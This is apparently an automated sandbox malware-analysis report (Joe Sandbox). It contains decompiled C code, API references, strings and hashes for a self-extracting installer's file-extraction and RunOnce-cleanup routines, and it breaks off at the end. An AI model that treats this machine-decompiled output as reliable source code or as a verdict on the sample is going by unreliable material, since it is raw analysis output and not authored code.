RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,008A538C,?,?,008A538C), ref: 008A2005
RegDeleteValueA.KERNELBASE(008A538C,wextract_cleanup0,?,?,008A538C), ref: 008A2017
RegCloseKey.ADVAPI32(008A538C,?,?,008A538C), ref: 008A2020

Strings

wextract_cleanup0, xrefs: 008A1FE7, 008A200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 008A1FFB

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
API String ID: 849931509-702805525
Opcode ID: e5161cd08155c61f35e64f8e0fd047a1991ba6dd74509bc642f705067d1214d6
Instruction ID: 6c58d69067366c9b8cb520155e0413fc617b95dd0f810a1f23b5a02268dc9a5c
Opcode Fuzzy Hash: e5161cd08155c61f35e64f8e0fd047a1991ba6dd74509bc642f705067d1214d6
Instruction Fuzzy Hash: C7E04F30D50718FBF7358B91EC4AF697B69F712740F100194BA04E0D60EB755A14D725

Uniqueness

Uniqueness Score: -1.00%

Function 008A4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008A4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x8a8004; // 0x8481bc1d
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x8a91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E008A4E99(_t75);
						L35:
						return E008A6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x8a8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x8a91e4;
						_t58 = 0x8a91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x8a91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x8a91e4;
						_t30 = E008A4702( &_v268, 0x8a91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E008A476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E008A4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E008A47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x8a93f4 =  *0x8a93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x8a91e4;
						_t63 = 0x8a91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x8a91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x8a91e4;
						_t30 = E008A4702( &_v268, 0x8a91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E008A4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E008A4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E008A4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x008a4cd0
0x008a4cdb
0x008a4ce0
0x008a4ce2
0x008a4cee
0x008a4cf2
0x008a4d0e
0x008a4d0e
0x008a4d11
0x008a4e83
0x008a4e88
0x008a4e98
0x008a4e98
0x008a4d17
0x008a4d17
0x008a4d1a
0x008a4d2f
0x008a4d2f
0x00000000
0x008a4d2f
0x008a4d1c
0x008a4d1c
0x008a4d1f
0x008a4dcb
0x008a4dd0
0x008a4dd2
0x008a4ddd
0x008a4ddd
0x008a4de3
0x008a4de8
0x008a4ded
0x008a4ded
0x008a4def
0x008a4df0
0x008a4df0
0x008a4df4
0x008a4df4
0x008a4df6
0x008a4df9
0x008a4dfc
0x008a4dfc
0x008a4dfe
0x008a4dff
0x008a4dff
0x008a4e03
0x008a4e08
0x008a4e0a
0x008a4e0f
0x008a4d03
0x008a4d03
0x00000000
0x008a4d03
0x008a4e18
0x008a4e20
0x008a4e25
0x008a4e27
0x00000000
0x00000000
0x008a4e33
0x008a4e38
0x008a4e3a
0x00000000
0x00000000
0x008a4e40
0x008a4e51
0x008a4e56
0x008a4e5b
0x008a4e5e
0x00000000
0x00000000
0x008a4e6a
0x008a4e6f
0x008a4e71
0x00000000
0x00000000
0x008a4e77
0x008a4e7d
0x00000000
0x008a4e7d
0x008a4d25
0x008a4d25
0x008a4d28
0x008a4d36
0x008a4d3b
0x008a4d40
0x008a4d40
0x008a4d42
0x008a4d43
0x008a4d43
0x008a4d47
0x008a4d4a
0x008a4d4a
0x008a4d4c
0x008a4d4f
0x008a4d4f
0x008a4d51
0x008a4d52
0x008a4d52
0x008a4d56
0x008a4d5b
0x008a4d5d
0x008a4d62
0x00000000
0x00000000
0x008a4d67
0x008a4d6f
0x008a4d74
0x008a4d76
0x00000000
0x00000000
0x008a4d7c
0x008a4d84
0x008a4d89
0x008a4d8b
0x00000000
0x00000000
0x008a4d94
0x008a4d99
0x008a4d9e
0x008a4da1
0x008a4daa
0x008a4daa
0x008a4da3
0x008a4da3
0x008a4da3
0x008a4db5
0x008a4dbb
0x008a4dbd
0x00000000
0x008a4dc3
0x008a4dc5
0x00000000
0x008a4dc5
0x008a4dbd
0x008a4d2a
0x008a4d2a
0x008a4d2d
0x00000000
0x00000000
0x00000000
0x008a4d2d
0x008a4cf8
0x008a4cfd
0x008a4d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 008A4DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 008A4DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A4D36, 008A4DE3

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3625706803-388467436
Opcode ID: c82704cbdf63acf0bab4c97985cd66aa622fb11e8a1c8ce718ad9b9eb89e367a
Instruction ID: e2d74bb5f4c5de3df2987e71a79c3f17d16421dca5627f5071a05bcfb545179c
Opcode Fuzzy Hash: c82704cbdf63acf0bab4c97985cd66aa622fb11e8a1c8ce718ad9b9eb89e367a
Instruction Fuzzy Hash: CA4121362041059BFF258F38DC446B6B3A5FBC7314B045668E882D7E86EBB6DE4AC750

Uniqueness

Uniqueness Score: -1.00%

Function 008A4C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x8a8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x8a8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x008a4c40
0x008a4c4a
0x008a4c8d
0x00000000
0x008a4c70
0x008a4c70
0x008a4c7e
0x008a4c86
0x00000000
0x00000000
0x00000000
0x008a4c8a

APIs

DosDateTimeToFileTime.KERNEL32 ref: 008A4C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 008A4C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 008A4C7E

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 17c8a842e010722a1891209896b45885efc1b3ab61a46a1a1d6d11cf5fa16baf
Instruction ID: 0fe076365d2e06ec86fdb76f003a32b832c50074883b37542102dae3a4aa27c2
Opcode Fuzzy Hash: 17c8a842e010722a1891209896b45885efc1b3ab61a46a1a1d6d11cf5fa16baf
Instruction Fuzzy Hash: C9F06D7260120CABBF249FA4CC48ABB7BECFB46250B44052AA81AC2850EB74D914C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 008A487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008A487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E008A490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x008a4880
0x008a488c
0x008a4894
0x008a48a0
0x008a48c9
0x008a48ce
0x008a48a2
0x008a48a8
0x008a48b7
0x008a48bc
0x008a48aa
0x008a48ac
0x008a48ac
0x008a48a8
0x008a48de
0x008a48e7
0x008a490b
0x008a48ee
0x008a48f0
0x00000000
0x008a4902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,008A4A23,?,008A4F67,*MEMCAB,00008000,00000180), ref: 008A48DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,008A4F67,*MEMCAB,00008000,00000180), ref: 008A4902

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e5debd93c57a127fb72670c921b23b8e9aa35e4db911153ab5515bbb8828396a
Instruction ID: e9c6f73ede788d38364caa6f039e3f057f2fdb20684dd102989f3543ecb8bc3e
Opcode Fuzzy Hash: e5debd93c57a127fb72670c921b23b8e9aa35e4db911153ab5515bbb8828396a
Instruction Fuzzy Hash: B8014BA3E125742AF72440295C88FB7551CEBD7734F1B1334BDAAE7DD2D6A84C0481E0

Uniqueness

Uniqueness Score: -1.00%

Function 008A4AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E008A4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x8a858c; // 0x26c
				_t9 = E008A3680(_t20);
				if( *0x8a91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x8a8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x8a9400; // 0xd9800
							_t15 = _t14 + _t25;
							 *0x8a9400 = _t15;
							if( *0x8a8184 != 0) {
								_t21 =  *0x8a8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x8a93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x008a4ad5
0x008a4adb
0x008a4ae7
0x008a4aee
0x008a4b05
0x008a4b0d
0x008a4b14
0x008a4b1a
0x008a4b1c
0x008a4b21
0x008a4b2a
0x008a4b2f
0x008a4b31
0x008a4b39
0x008a4b54
0x008a4b54
0x008a4b39
0x008a4b2f
0x008a4b0f
0x008a4b0f
0x008a4b0f
0x008a4b5e
0x008a4ae9
0x008a4aed
0x008a4aed

APIs

Part of subcall function 008A3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 008A369F
Part of subcall function 008A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008A36B2
Part of subcall function 008A3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008A36DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 008A4B05

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: ac7893d996b67cbae9376319582368588db2b88fcaf26f8ef824ef0941840dc3
Instruction ID: 4d8f9d7b952332e96293079725a5efa3a07613113c2b19fc528bdad1a1b4938d
Opcode Fuzzy Hash: ac7893d996b67cbae9376319582368588db2b88fcaf26f8ef824ef0941840dc3
Instruction Fuzzy Hash: 98018031200205ABFB148F68DC05BA67B59F786725F149225F93ADB9E0CBB4D812CB61

Uniqueness

Uniqueness Score: -1.00%

Function 008A658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x8a8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x8a8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E008A16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x008a6592
0x008a6594
0x008a6596
0x008a6598
0x008a6598
0x008a659b
0x008a659b
0x008a659d
0x008a659e
0x008a65a2
0x008a65a4
0x008a65a9
0x008a65b2
0x008a65b6
0x008a65ba
0x008a65c3
0x008a65c5
0x008a65c8
0x008a65c8
0x008a65c3
0x008a65c9
0x008a65cc
0x008a65d2
0x008a65d1
0x008a65d1
0x00000000
0x008a65dc
0x00000000

APIs

CharPrevA.USER32(008A8B3E,008A8B3F,00000001,008A8B3E,-00000003,?,008A60EC,008A1140,?), ref: 008A65BA

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 12ffa356b338e7e1f2d7ef9bb42c6445d3262cd061879b5b9812d28831a75102
Instruction ID: db13d96859483aa272c7f83614494be5a0549f736a6c500a0d436ad0b7733851
Opcode Fuzzy Hash: 12ffa356b338e7e1f2d7ef9bb42c6445d3262cd061879b5b9812d28831a75102
Instruction Fuzzy Hash: 18F02832E042509FF731491D9884B76BFDAFB87350F2C016AE9DAC3A0DFA658C5582A4

Uniqueness

Uniqueness Score: -1.00%

Function 008A621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E008A621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E008A597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E008A44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x8a9124 = E008A6285();
					_t9 = 0;
				}
				return E008A6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x008a6229
0x008a6230
0x008a6247
0x008a626a
0x008a6272
0x008a6249
0x008a6255
0x008a625f
0x008a6264
0x008a6264
0x008a6284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008A623F

Part of subcall function 008A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 008A4518
Part of subcall function 008A44B9: MessageBoxA.USER32(?,?,siga30,00010010), ref: 008A4554

Part of subcall function 008A6285: GetLastError.KERNEL32(008A5BBC), ref: 008A6285

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: b2a300b8d8d2a9e9e5877bfad5a146a99cb601a0b3d258d0b94b221fa0f0510e
Instruction ID: 5f3d325e38203ee3e23618fa480d2ee6474377dc0ad56862c6d9740f572538e9
Opcode Fuzzy Hash: b2a300b8d8d2a9e9e5877bfad5a146a99cb601a0b3d258d0b94b221fa0f0510e
Instruction Fuzzy Hash: E7F0E970704208ABF750EF789D02FBE37BCFB45700F440069B985D6881FE749D548651

Uniqueness

Uniqueness Score: -1.00%

Function 008A4B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x8a8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x8a8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x8a8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x8a8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x8a8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x8a8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x8a8d6c)) = 0;
				return 0;
			}

0x008a4b66
0x008a4b74
0x008a4b98
0x008a4ba0
0x00000000
0x008a4bac
0x008a4ba4
0x00000000
0x008a4ba4
0x008a4b78
0x008a4b7e
0x008a4b84
0x008a4b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,008A4FA1,00000000), ref: 008A4B98

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d8977a6866e537482434d100e52f78e82e8487fc78f6088dbfc44b0da35ad045
Instruction ID: ba398c7c325cf7edabacde44adc955b6216b667c4d6fd8553f21074925278488
Opcode Fuzzy Hash: d8977a6866e537482434d100e52f78e82e8487fc78f6088dbfc44b0da35ad045
Instruction Fuzzy Hash: 87F0FE31910B08DE67618E798C00652BFE4FAD7360310193AA46ED3990EBB0A451CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 008A66AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x008a66b1
0x008a66ba
0x008a66c7
0x008a66bc
0x008a66be
0x008a66be

APIs

GetFileAttributesA.KERNELBASE(?,008A4777,?,008A4E38,?), ref: 008A66B1

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8bc2a1853e20f276728a989c3a3bbb357d308e085f5a7b93cc3015d0fe93091f
Instruction ID: 924ffa3ad611926eba0de3f38579e1fcb3f13e18943c78dcea37ecee8e3d878c
Opcode Fuzzy Hash: 8bc2a1853e20f276728a989c3a3bbb357d308e085f5a7b93cc3015d0fe93091f
Instruction Fuzzy Hash: FCB09276262840827A640631AC296563841F6E263A7E81B90F032C09E4DB3EC856D004

Uniqueness

Uniqueness Score: -1.00%

Function 008A4CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x008a4caa
0x008a4cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 008A4CAA

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 87e0a39793d6cc47f05291a3488b635a8c27273479e74b91717cc6054d5937cf
Instruction ID: 839e12975e9c985095f3fac69557eb46f1399f562ffa4f628f270ea5bbcbd24b
Opcode Fuzzy Hash: 87e0a39793d6cc47f05291a3488b635a8c27273479e74b91717cc6054d5937cf
Instruction Fuzzy Hash: 1FB09232044208B7DB401A82A809B853F59E789661F140000F60C458508A6294108696

Uniqueness

Uniqueness Score: -1.00%

Function 008A4CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E008A4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x008a4cc8
0x008a4ccf

APIs

GlobalFree.KERNELBASE ref: 008A4CC8

Memory Dump Source

